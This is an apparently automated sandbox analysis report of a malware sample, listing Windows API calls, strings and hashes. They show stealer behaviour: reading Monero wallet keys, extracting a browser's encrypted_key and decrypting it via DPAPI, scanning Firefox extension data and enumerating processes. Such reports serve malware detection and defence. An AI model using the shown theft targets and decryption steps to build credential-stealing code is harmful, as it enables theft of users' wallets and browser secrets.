                                  • lstrlen.KERNEL32(00000000), ref: 00BADAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BADB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BAA664
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BC1678,00BC0D93), ref: 00BAF64C
                                  • lstrlen.KERNEL32(00000000), ref: 00BAF66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BAA489
                                    • Part of subcall function 00BAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA23F
                                    • Part of subcall function 00BAA210: LocalAlloc.KERNEL32(00000040,?,?,?,00BA4F3E,00000000,?), ref: 00BAA251
                                    • Part of subcall function 00BAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA27A
                                    • Part of subcall function 00BAA210: LocalFree.KERNEL32(?,?,?,?,00BA4F3E,00000000,?), ref: 00BAA28F
                                    • Part of subcall function 00BAA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BAA2D4
                                    • Part of subcall function 00BAA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BAA2F3
                                    • Part of subcall function 00BAA2B0: LocalFree.KERNEL32(?), ref: 00BAA323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 6f3b61d29f064825f5a98c230e2936829e696c9ddc1c97b7569235727b0cdb52
                                  • Instruction ID: 1385eecacce8d969d106d54edd5303a59f40d8183ef19efe3e5a53bc950c6911
                                  • Opcode Fuzzy Hash: 6f3b61d29f064825f5a98c230e2936829e696c9ddc1c97b7569235727b0cdb52
                                  • Instruction Fuzzy Hash: 5C3163B6D00208ABCF04EBE4DC55EEEB7F8AF59300F044598E911B3241E7309A04CBB6
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BC05BF), ref: 00BB885A
                                  • Process32First.KERNEL32(?,00000128), ref: 00BB886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 00BB8883
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • CloseHandle.KERNEL32(?), ref: 00BB88F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 4362ea7b944ca9c2e018c0853e604eb86708499b0bf937650bcf018a90dcff37
                                  • Instruction ID: c5b0bb86fdf387f17dcf90fcc19fc30dec4ff1570182a308a778e907d4e4ba35
                                  • Opcode Fuzzy Hash: 4362ea7b944ca9c2e018c0853e604eb86708499b0bf937650bcf018a90dcff37
                                  • Instruction Fuzzy Hash: 0F314D71911218ABCB24EF95DD91FFEB7B8EB44700F5041D9F10EA21A0EBB06A44CFA1
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C1FE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C1FE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: b12a343c1edbf1ed33e4420eb2f8e92b87a6994cbcfc970720b724f125b01426
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: 6501D432209731EEFA3426B56CC99A73694EF127B5738433DF526805F2EF924C82B180
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BC0DE8,00000000,?), ref: 00BB7B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00BC0DE8,00000000,?), ref: 00BB7B54
                                  • wsprintfA.USER32 ref: 00BB7B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 6c5ac42f0bc3b30ffff384a82d68a2d3d1724a16830d3be77a0d728172652264
                                  • Instruction ID: 5c265be6398c695675fae594f60d546e580a232873ffffb98b2d2b80769c2f92
                                  • Opcode Fuzzy Hash: 6c5ac42f0bc3b30ffff384a82d68a2d3d1724a16830d3be77a0d728172652264
                                  • Instruction Fuzzy Hash: 87115AB2908218ABCB14DBCADD44BBEB7F8FB4CB11F00415AF655A2290E7795940C7B0
                                  APIs
                                  • CreateFileA.KERNEL32(00BB3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00BB3D3E,?), ref: 00BB948C
                                  • GetFileSizeEx.KERNEL32(000000FF,00BB3D3E), ref: 00BB94A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 00BB94B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: 2211c140ea6e2a0ddb9593802d9f7d41411594e223ca88f90b4fc29cb2b95eb5
                                  • Instruction ID: 4726ab5d6dd72d04f48270a9ce7e19499981f54df51c417809645a654599a15d
                                  • Opcode Fuzzy Hash: 2211c140ea6e2a0ddb9593802d9f7d41411594e223ca88f90b4fc29cb2b95eb5
                                  • Instruction Fuzzy Hash: B3F04435E04208BFDB20DFB1DC49F9E77B9AB48710F10C594FA55A7280D6B09A458B40
                                  APIs
                                  • __getptd.LIBCMT ref: 00BBCA7E
                                    • Part of subcall function 00BBC2A0: __amsg_exit.LIBCMT ref: 00BBC2B0
                                  • __getptd.LIBCMT ref: 00BBCA95
                                  • __amsg_exit.LIBCMT ref: 00BBCAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00BBCAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: b51ba7679abff4a8f1fc36b8395ea34e2e422274912686973a4d4607485878e5
                                  • Instruction ID: 88f18beb7e7df4dd12eb59a24c569ed92c4abd483bd654dd361c3f3a60a551a8
                                  • Opcode Fuzzy Hash: b51ba7679abff4a8f1fc36b8395ea34e2e422274912686973a4d4607485878e5
                                  • Instruction Fuzzy Hash: C0F090329446189BD624FBA89803FFE3FE0AF44720F1001C9F409A72D6CFE45D40CA96
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: 39f09d7f22e026cf320f0139dd483a08d425797fd35cd22c6cfc009c228fdfb8
                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: AA416A71900219AFDF15DF98EC81AEEBBB5FF48304F2880AAF91467212D3359A90DF54
                                  APIs
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB51CA
                                  • lstrcat.KERNEL32(?,00BC1058), ref: 00BB51E7
                                  • lstrcat.KERNEL32(?,01309688), ref: 00BB51FB
                                  • lstrcat.KERNEL32(?,00BC105C), ref: 00BB520D
                                    • Part of subcall function 00BB4B60: wsprintfA.USER32 ref: 00BB4B7C
                                    • Part of subcall function 00BB4B60: FindFirstFileA.KERNEL32(?,?), ref: 00BB4B93
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC0FC4), ref: 00BB4BC1
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC0FC8), ref: 00BB4BD7
                                    • Part of subcall function 00BB4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4DCD
                                    • Part of subcall function 00BB4B60: FindClose.KERNEL32(000000FF), ref: 00BB4DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: daa440bfcaf4886cf5a86f04a6af4574e1b7bb2669ab9164bb40b844a15dbfae
                                  • Instruction ID: b03475c477ebd4204e5cf2cc5cb083c3600ae7364bb784ab8914d14e93cfc013
                                  • Opcode Fuzzy Hash: daa440bfcaf4886cf5a86f04a6af4574e1b7bb2669ab9164bb40b844a15dbfae
                                  • Instruction Fuzzy Hash: 1C21A0B6904108ABCB54FF70EC46FFD737C9755300F0045D8B69966191DEB596CC8B91